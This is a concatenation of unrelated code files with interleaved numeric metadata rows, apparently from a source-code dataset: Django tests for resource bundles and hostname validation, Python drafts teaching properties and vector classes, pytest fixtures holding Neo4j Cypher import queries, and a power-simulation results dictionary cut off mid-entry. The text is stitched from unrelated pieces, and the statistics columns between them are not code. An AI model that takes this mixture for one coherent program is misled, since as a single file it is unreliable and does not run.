        # Concrete bundle with two booked hosts instantiating the templates.
        bundle = ResourceBundle.objects.create(template=self.genericBundle)
        self.host1 = Host.objects.create(
            template=self.gHost1,
            booked=True,
            name='host1',
            bundle=bundle,
            profile=hostProfile,
            lab=self.lab
        )
        self.host2 = Host.objects.create(
            template=self.gHost2,
            booked=True,
            name='host2',
            bundle=bundle,
            profile=hostProfile,
            lab=self.lab
        )
        # NOTE(review): both vlans share vlan_id=300 — confirm intent.
        vlan1 = Vlan.objects.create(vlan_id=300, tagged=False)
        vlan2 = Vlan.objects.create(vlan_id=300, tagged=False)
        Interface.objects.create(
            mac_address='00:11:22:33:44:55',
            bus_address='some bus address',
            switch_name='switch1',
            port_name='port10',
            config=vlan1,
            host=self.host1
        )
        Interface.objects.create(
            mac_address='00:11:22:33:44:56',
            bus_address='some bus address',
            switch_name='switch1',
            port_name='port12',
            config=vlan2,
            host=self.host2
        )

    def test_convert_bundle(self):
        """Converting the generic bundle must complete without error."""
        # convertResoureBundle (sic) is the ResourceManager API name.
        ResourceManager.getInstance().convertResoureBundle(self.genericBundle, self.lab.name)
        # verify bundle configuration
class HostNameValidatorTestCase(TestCase):
    """Exercises HostNameValidator.is_valid_hostname on good and bad names."""

    def test_valid_hostnames(self):
        """Mixed case, digits, and interior hyphens are all acceptable."""
        accepted = (
            "localhost", "Localhost", "localHost", "LOCALHOST",
            "f", "abc123doreyme", "F9999999",
            "my-host", "My-Host", "MY-HOST", "a-long-name-for-my-host",
        )
        for candidate in accepted:
            self.assertTrue(HostNameValidator.is_valid_hostname(candidate))

    def test_invalid_hostnames(self):
        """Leading hyphen, all-digit names, and over-long names are rejected."""
        rejected = (
            "-long-name-for-my-host",
            "546",
            "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
        )
        for candidate in rejected:
            self.assertFalse(HostNameValidator.is_valid_hostname(candidate))

    def test_invalid_chars(self):
        """Every punctuation character other than '-' invalidates a name."""
        # Same character set as the original assertion list (incl. the
        # duplicated single quote).
        for bad_char in "!@#$%^&*()_=+|\\[];:'\"'<>,?/`~":
            self.assertFalse(
                HostNameValidator.is_valid_hostname("contains" + bad_char + "char")
            )
| 36.566225
| 130
| 0.633886
| 1,058
| 11,043
| 6.488658
| 0.167297
| 0.119009
| 0.150328
| 0.200437
| 0.811071
| 0.793591
| 0.756009
| 0.747997
| 0.747997
| 0.747997
| 0
| 0.020679
| 0.255547
| 11,043
| 301
| 131
| 36.687708
| 0.814378
| 0.049624
| 0
| 0.586345
| 0
| 0
| 0.098246
| 0.010658
| 0
| 0
| 0
| 0
| 0.208835
| 1
| 0.040161
| false
| 0
| 0.024096
| 0
| 0.076305
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
64845da1e41ddb29434c1732975b034ecbd4a15d
| 7,994
|
py
|
Python
|
Module 2/B04710_CodeBundle/Chapter 3/B04170_03_Python_Draft_01.py
|
wagnerhsu/packt-Object-oriented-programming-for-JavaScript-developers
|
a305fabfa0195e7a6e57a4fe57ff9b4f1d55bdcc
|
[
"MIT"
] | 8
|
2016-10-16T13:01:30.000Z
|
2021-11-08T13:10:17.000Z
|
Module 2/B04710_CodeBundle/Chapter 3/B04170_03_Python_Draft_01.py
|
wagnerhsu/packt-Object-oriented-programming-for-JavaScript-developers
|
a305fabfa0195e7a6e57a4fe57ff9b4f1d55bdcc
|
[
"MIT"
] | null | null | null |
Module 2/B04710_CodeBundle/Chapter 3/B04170_03_Python_Draft_01.py
|
wagnerhsu/packt-Object-oriented-programming-for-JavaScript-developers
|
a305fabfa0195e7a6e57a4fe57ff9b4f1d55bdcc
|
[
"MIT"
] | 5
|
2016-08-24T09:43:42.000Z
|
2019-11-20T10:54:29.000Z
|
class TibetanSpaniel:
    # Class-level (shared) breed attributes.
    family = "Companion, herding"
    area_of_origin = "Tibet"
    learning_rate = 9
    obedience = 3
    problem_solving = 8

    def __init__(self, name, favorite_toy, watchdog_ability):
        """Store per-instance attributes, then print the shared family string."""
        self.name = name
        self.watchdog_ability = watchdog_ability
        self.favorite_toy = favorite_toy
        print(TibetanSpaniel.family)


# Demonstrates class attributes vs. instance attributes:
brian = TibetanSpaniel("Brian", "Talking Minion", 4)
print(brian.family)  # no instance attribute, so lookup falls back to the class
TibetanSpaniel.obedience = 4  # rebinds the class attribute for all instances
brian.obedience = 8  # creates an instance attribute that shadows the class one
print(type(brian).obedience)  # 4 — reads the class attribute via the type
print(TibetanSpaniel.obedience)  # 4
print(brian.obedience)  # 8 — the instance attribute wins
class TibetanSpaniel:
    """Breed data; instance fields use single-underscore ("protected") names."""

    # Shared breed attributes.
    family = "Companion, herding"
    area_of_origin = "Tibet"
    learning_rate = 9
    obedience = 3
    problem_solving = 8

    def __init__(self, name, favorite_toy, watchdog_ability):
        # Same per-instance data as before, stored under _-prefixed names
        # to signal "internal" by convention.
        self._favorite_toy = favorite_toy
        self._watchdog_ability = watchdog_ability
        self._name = name
class TibetanSpaniel:
    """Breed data; instance fields use double-underscore (name-mangled) names."""

    # Shared breed attributes.
    family = "Companion, herding"
    area_of_origin = "Tibet"
    learning_rate = 9
    obedience = 3
    problem_solving = 8

    def __init__(self, name, favorite_toy, watchdog_ability):
        # Double underscores trigger name mangling: these are stored as
        # _TibetanSpaniel__name etc. on the instance.
        self.__favorite_toy = favorite_toy
        self.__watchdog_ability = watchdog_ability
        self.__name = name
class TibetanSpaniel:
    family = "Companion, herding"
    area_of_origin = "Tibet"
    learning_rate = 9
    obedience = 3
    problem_solving = 8

    def __init__(self, name, favorite_toy, watchdog_ability):
        # Name-mangled ("private") instance attributes.
        self.__name = name
        self.__watchdog_ability = watchdog_ability
        self.__favorite_toy = favorite_toy

    @property
    def name(self):
        """Getter only — no name.setter is defined, so `name` is read-only."""
        return self.__name


merlin = TibetanSpaniel("Merlin", "Talking Smurf", 6)
# NOTE: this assignment raises AttributeError because the `name` property has
# no setter — this draft snippet deliberately demonstrates that failure.
merlin.name = "brian"
class TibetanSpaniel:
    """Breed data with a read-only `name` and a read/write `favorite_toy`."""

    # Shared breed attributes.
    family = "Companion, herding"
    area_of_origin = "Tibet"
    learning_rate = 9
    obedience = 3
    problem_solving = 8

    def __init__(self, name, favorite_toy, watchdog_ability):
        self.__favorite_toy = favorite_toy
        self.__watchdog_ability = watchdog_ability
        self.__name = name

    @property
    def name(self):
        """The dog's name; exposed without a setter, so it cannot be rebound."""
        return self.__name

    @property
    def favorite_toy(self):
        """Current favorite toy."""
        return self.__favorite_toy

    @favorite_toy.setter
    def favorite_toy(self, toy):
        self.__favorite_toy = toy
class TibetanSpaniel:
    """Breed data; watchdog_ability assignments are clamped to the 0–10 scale."""

    # Shared breed attributes.
    family = "Companion, herding"
    area_of_origin = "Tibet"
    learning_rate = 9
    obedience = 3
    problem_solving = 8

    def __init__(self, name, favorite_toy, watchdog_ability):
        self.__favorite_toy = favorite_toy
        self.__watchdog_ability = watchdog_ability
        self.__name = name

    @property
    def name(self):
        """Read-only dog name."""
        return self.__name

    @property
    def favorite_toy(self):
        """Current favorite toy."""
        return self.__favorite_toy

    @favorite_toy.setter
    def favorite_toy(self, toy):
        self.__favorite_toy = toy

    @property
    def watchdog_ability(self):
        """Watchdog ability on a 0–10 scale."""
        return self.__watchdog_ability

    @watchdog_ability.setter
    def watchdog_ability(self, ability):
        # Clamp into [0, 10]; equivalent to the original if/elif chain.
        self.__watchdog_ability = max(0, min(10, ability))


hugo = TibetanSpaniel("Hugo", "Tennis ball", 7)
hugo.watchdog_ability = -3
print(hugo.watchdog_ability)
hugo.watchdog_ability = 30
print(hugo.watchdog_ability)
hugo.watchdog_ability = 8
print(hugo.watchdog_ability)
class TibetanSpaniel:
    """Breed data with a clamped watchdog score and a derived protection score."""

    # Shared breed attributes.
    family = "Companion, herding"
    area_of_origin = "Tibet"
    learning_rate = 9
    obedience = 3
    problem_solving = 8

    def __init__(self, name, favorite_toy, watchdog_ability):
        self.__name = name
        self.__watchdog_ability = watchdog_ability
        self.__favorite_toy = favorite_toy

    @property
    def name(self):
        """Read-only dog name."""
        return self.__name

    @property
    def favorite_toy(self):
        """Current favorite toy."""
        return self.__favorite_toy

    @favorite_toy.setter
    def favorite_toy(self, favorite_toy):
        self.__favorite_toy = favorite_toy

    @property
    def watchdog_ability(self):
        """Watchdog ability on a 0–10 scale."""
        return self.__watchdog_ability

    @watchdog_ability.setter
    def watchdog_ability(self, watchdog_ability):
        # Clamp assigned values into [0, 10].
        if watchdog_ability < 0:
            self.__watchdog_ability = 0
        elif watchdog_ability > 10:
            self.__watchdog_ability = 10
        else:
            self.__watchdog_ability = watchdog_ability

    @property
    def protection_score(self):
        """Floored mean of watchdog ability, learning rate and problem solving."""
        # FIX: `math` is never imported at module level in this draft, so
        # the original raised NameError here; import locally instead.
        import math
        return math.floor((self.__watchdog_ability + type(self).learning_rate + type(self).problem_solving) / 3)


cole = TibetanSpaniel("Cole", "Soccer ball", 4)
print(cole.protection_score)
class TibetanSpaniel:
    """Breed data with a clamped watchdog score and a derived protection score."""

    # Shared breed attributes.
    family = "Companion, herding"
    area_of_origin = "Tibet"
    learning_rate = 9
    obedience = 3
    problem_solving = 8

    def __init__(self, name, favorite_toy, watchdog_ability):
        self.__name = name
        self.__watchdog_ability = watchdog_ability
        self.__favorite_toy = favorite_toy

    @property
    def name(self):
        """Read-only dog name."""
        return self.__name

    @property
    def favorite_toy(self):
        """Current favorite toy."""
        return self.__favorite_toy

    @favorite_toy.setter
    def favorite_toy(self, favorite_toy):
        self.__favorite_toy = favorite_toy

    @property
    def watchdog_ability(self):
        """Watchdog ability on a 0–10 scale."""
        return self.__watchdog_ability

    @watchdog_ability.setter
    def watchdog_ability(self, watchdog_ability):
        # Clamp assigned values into [0, 10].
        if watchdog_ability < 0:
            self.__watchdog_ability = 0
        elif watchdog_ability > 10:
            self.__watchdog_ability = 10
        else:
            self.__watchdog_ability = watchdog_ability

    @property
    def protection_score(self):
        """Floored mean of watchdog ability, learning rate and problem solving."""
        # FIX: `math` is never imported at module level in this draft, so
        # the original raised NameError here; import locally instead.
        import math
        return math.floor((self.__watchdog_ability + type(self).learning_rate + type(self).problem_solving) / 3)
class MutableVector3D:
    """A mutable 3-D vector: readable/writable x, y, z plus in-place addition."""

    def __init__(self, x, y, z):
        self.__x = x
        self.__y = y
        self.__z = z

    def sum(self, delta_x, delta_y, delta_z):
        """Add the three deltas to this vector's components in place."""
        self.__x = self.__x + delta_x
        self.__y = self.__y + delta_y
        self.__z = self.__z + delta_z

    @property
    def x(self):
        """X component."""
        return self.__x

    @x.setter
    def x(self, value):
        self.__x = value

    @property
    def y(self):
        """Y component."""
        return self.__y

    @y.setter
    def y(self, value):
        self.__y = value

    @property
    def z(self):
        """Z component."""
        return self.__z

    @z.setter
    def z(self, value):
        self.__z = value
class MutableVector3D:
    """Mutable 3-D vector with an `origin_vector` alternate constructor."""

    def __init__(self, x, y, z):
        self.__x = x
        self.__y = y
        self.__z = z

    def sum(self, delta_x, delta_y, delta_z):
        """Add the three deltas to this vector's components in place."""
        self.__x = self.__x + delta_x
        self.__y = self.__y + delta_y
        self.__z = self.__z + delta_z

    @property
    def x(self):
        """X component."""
        return self.__x

    @x.setter
    def x(self, value):
        self.__x = value

    @property
    def y(self):
        """Y component."""
        return self.__y

    @y.setter
    def y(self, value):
        self.__y = value

    @property
    def z(self):
        """Z component."""
        return self.__z

    @z.setter
    def z(self, value):
        self.__z = value

    @classmethod
    def origin_vector(cls):
        """Alternate constructor: the zero vector."""
        return cls(0, 0, 0)


mutableVector3D = MutableVector3D.origin_vector()
mutableVector3D.sum(5, 10, 15)
print(mutableVector3D.x, mutableVector3D.y, mutableVector3D.z)
class ImmutableVector3D:
    """Immutable 3-D vector: `sum` returns a new instance instead of mutating."""

    def __init__(self, x, y, z):
        self.__x = x
        self.__y = y
        self.__z = z

    def sum(self, delta_x, delta_y, delta_z):
        """Return a new vector of the same class with the deltas added."""
        cls = type(self)
        return cls(self.__x + delta_x, self.__y + delta_y, self.__z + delta_z)

    @property
    def x(self):
        """X component (read-only)."""
        return self.__x

    @property
    def y(self):
        """Y component (read-only)."""
        return self.__y

    @property
    def z(self):
        """Z component (read-only)."""
        return self.__z

    @classmethod
    def equal_elements_vector(cls, initial_value):
        """Alternate constructor: all three components set to initial_value."""
        return cls(initial_value, initial_value, initial_value)

    @classmethod
    def origin_vector(cls):
        """Alternate constructor: the zero vector."""
        return cls.equal_elements_vector(0)


vector0 = ImmutableVector3D.origin_vector()
vector1 = vector0.sum(5, 10, 15)
print(vector1.x, vector1.y, vector1.z)
| 21.663957
| 112
| 0.650613
| 972
| 7,994
| 4.950617
| 0.073045
| 0.202618
| 0.098712
| 0.076475
| 0.852452
| 0.847049
| 0.847049
| 0.813383
| 0.802161
| 0.802161
| 0
| 0.014278
| 0.264073
| 7,994
| 368
| 113
| 21.722826
| 0.803672
| 0
| 0
| 0.870229
| 0
| 0
| 0.032149
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.20229
| false
| 0
| 0
| 0.103053
| 0.5
| 0.041985
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
|
0
| 10
|
648b4acbbb22601f0875b7e7d65aad88744eb425
| 3,357
|
py
|
Python
|
tests/fixtures/fixture_writer.py
|
avisionh/sqlquerygraph
|
fabe5c77dba2eb692b456d4c7b9883ec2032406e
|
[
"MIT"
] | 3
|
2021-05-17T17:07:47.000Z
|
2022-01-01T14:28:38.000Z
|
tests/fixtures/fixture_writer.py
|
avisionh/sqlquerygraph
|
fabe5c77dba2eb692b456d4c7b9883ec2032406e
|
[
"MIT"
] | 10
|
2021-05-20T22:53:49.000Z
|
2021-06-13T21:58:04.000Z
|
tests/fixtures/fixture_writer.py
|
avisionh/sqlquerygraph
|
fabe5c77dba2eb692b456d4c7b9883ec2032406e
|
[
"MIT"
] | null | null | null |
import pytest
@pytest.fixture()
def datasets():
    """Dataset names shared by the other fixtures in this module."""
    names = ["Reporting", "Analytics", "GitHub_Repos"]
    return names
@pytest.fixture()
def dir_file():
    """Relative directory where the neo4j example files live."""
    path = "example/neo4j"
    return path
@pytest.fixture()
def query_constraint():
    """Expected Cypher CREATE CONSTRAINT statements, one per dataset label.

    The adjacent string literals concatenate into a single multi-statement
    script; each constraint enforces a unique table_name per node label.
    """
    return (
        "CREATE CONSTRAINT table_name_ConstraintReporting ON (r:Reporting)\n"
        "ASSERT r.table_name IS UNIQUE;\n"
        "CREATE CONSTRAINT table_name_ConstraintAnalytics ON (a:Analytics)\n"
        "ASSERT a.table_name IS UNIQUE;\n"
        "CREATE CONSTRAINT table_name_ConstraintGitHub_Repos ON (g:GitHub_Repos)\n"
        "ASSERT g.table_name IS UNIQUE;\n"
    )
@pytest.fixture()
def query_node_import():
    """Expected Cypher LOAD CSV statements creating one node per CSV row.

    One CSV-import pair per dataset label; each node records the table name,
    its dataset, and an import timestamp.
    """
    return (
        'USING PERIODIC COMMIT 500 LOAD CSV WITH HEADERS FROM "file:///reporting_tables.csv" AS csvLine\n'
        "CREATE (:Reporting {table_name: toString(csvLine.table_name), table_dataset: toString(csvLine.table_dataset), import_datetime: datetime()});\n"
        'USING PERIODIC COMMIT 500 LOAD CSV WITH HEADERS FROM "file:///analytics_tables.csv" AS csvLine\n'
        "CREATE (:Analytics {table_name: toString(csvLine.table_name), table_dataset: toString(csvLine.table_dataset), import_datetime: datetime()});\n"
        'USING PERIODIC COMMIT 500 LOAD CSV WITH HEADERS FROM "file:///github_repos_tables.csv" AS csvLine\n'
        "CREATE (:GitHub_Repos {table_name: toString(csvLine.table_name), table_dataset: toString(csvLine.table_dataset), import_datetime: datetime()});\n"
    )
@pytest.fixture()
def query_rel():
    """Expected Cypher LOAD CSV statements creating HAS_TABLE_DEPENDENCY edges.

    For each dependency CSV, MERGE matches (or creates) the source and target
    nodes, then CREATE adds a timestamped relationship between them.
    """
    return (
        'USING PERIODIC COMMIT 500 LOAD CSV WITH HEADERS FROM "file:///reporting_analytics_dependency.csv" AS csvLine\n'
        "MERGE (a:Reporting {table_name: toString(csvLine.table_name), table_dataset: toString(csvLine.table_dataset)})\n"
        "MERGE (b:Analytics {table_name: toString(csvLine.dependency_name), table_dataset: toString(csvLine.dependency_dataset)})\n"
        "CREATE (a)-[:HAS_TABLE_DEPENDENCY {import_datetime: datetime()}]->(b);\n"
        'USING PERIODIC COMMIT 500 LOAD CSV WITH HEADERS FROM "file:///reporting_github_repos_dependency.csv" AS csvLine\n'
        "MERGE (a:Reporting {table_name: toString(csvLine.table_name), table_dataset: toString(csvLine.table_dataset)})\n"
        "MERGE (b:GitHub_Repos {table_name: toString(csvLine.dependency_name), table_dataset: toString(csvLine.dependency_dataset)})\n"
        "CREATE (a)-[:HAS_TABLE_DEPENDENCY {import_datetime: datetime()}]->(b);\n"
        'USING PERIODIC COMMIT 500 LOAD CSV WITH HEADERS FROM "file:///analytics_analytics_dependency.csv" AS csvLine\n'
        "MERGE (a:Analytics {table_name: toString(csvLine.table_name), table_dataset: toString(csvLine.table_dataset)})\n"
        "MERGE (b:Analytics {table_name: toString(csvLine.dependency_name), table_dataset: toString(csvLine.dependency_dataset)})\n"
        "CREATE (a)-[:HAS_TABLE_DEPENDENCY {import_datetime: datetime()}]->(b);\n"
        'USING PERIODIC COMMIT 500 LOAD CSV WITH HEADERS FROM "file:///analytics_github_repos_dependency.csv" AS csvLine\n'
        "MERGE (a:Analytics {table_name: toString(csvLine.table_name), table_dataset: toString(csvLine.table_dataset)})\n"
        "MERGE (b:GitHub_Repos {table_name: toString(csvLine.dependency_name), table_dataset: toString(csvLine.dependency_dataset)})\n"
        "CREATE (a)-[:HAS_TABLE_DEPENDENCY {import_datetime: datetime()}]->(b);\n"
    )
| 57.87931
| 155
| 0.722371
| 432
| 3,357
| 5.398148
| 0.118056
| 0.092624
| 0.120069
| 0.113208
| 0.863208
| 0.837479
| 0.8006
| 0.8006
| 0.792882
| 0.746569
| 0
| 0.007692
| 0.148049
| 3,357
| 57
| 156
| 58.894737
| 0.807692
| 0
| 0
| 0.425532
| 0
| 0.234043
| 0.816801
| 0.359547
| 0
| 0
| 0
| 0
| 0.06383
| 1
| 0.106383
| true
| 0
| 0.191489
| 0.106383
| 0.404255
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
|
0
| 10
|
649660841836c29cf2d40e03e8d5d8298b76ad8f
| 68,595
|
py
|
Python
|
benchmarks/SimResults/micro_pinned_train_combos/cmpD_astarlbmtontoh264ref/power.py
|
TugberkArkose/MLScheduler
|
e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061
|
[
"Unlicense"
] | null | null | null |
benchmarks/SimResults/micro_pinned_train_combos/cmpD_astarlbmtontoh264ref/power.py
|
TugberkArkose/MLScheduler
|
e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061
|
[
"Unlicense"
] | null | null | null |
benchmarks/SimResults/micro_pinned_train_combos/cmpD_astarlbmtontoh264ref/power.py
|
TugberkArkose/MLScheduler
|
e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061
|
[
"Unlicense"
] | null | null | null |
power = {'BUSES': {'Area': 1.33155,
'Bus/Area': 1.33155,
'Bus/Gate Leakage': 0.00662954,
'Bus/Peak Dynamic': 0.0,
'Bus/Runtime Dynamic': 0.0,
'Bus/Subthreshold Leakage': 0.0691322,
'Bus/Subthreshold Leakage with power gating': 0.0259246,
'Gate Leakage': 0.00662954,
'Peak Dynamic': 0.0,
'Runtime Dynamic': 0.0,
'Subthreshold Leakage': 0.0691322,
'Subthreshold Leakage with power gating': 0.0259246},
'Core': [{'Area': 32.6082,
'Execution Unit/Area': 8.2042,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.202689,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.0,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.122718,
'Execution Unit/Instruction Scheduler/Area': 2.17927,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.328073,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.00115349,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.20978,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.284464,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.017004,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00962066,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00730101,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 1.00996,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00529112,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 2.07911,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.49259,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0800117,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0455351,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 4.84781,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.841232,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.000856399,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.55892,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.282514,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.0178624,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00897339,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 1.05957,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.114878,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.0641291,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.281181,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 5.42205,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0103121,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0745691,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.076264,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.0745691,
'Execution Unit/Register Files/Runtime Dynamic': 0.0865761,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0442632,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00607074,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.180189,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.515645,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.0920413,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0345155,
'Execution Unit/Runtime Dynamic': 2.26985,
'Execution Unit/Subthreshold Leakage': 1.83518,
'Execution Unit/Subthreshold Leakage with power gating': 0.709678,
'Gate Leakage': 0.372997,
'Instruction Fetch Unit/Area': 5.86007,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00213583,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00213583,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00189647,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000753928,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00109554,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00726367,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0191864,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0590479,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0733145,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
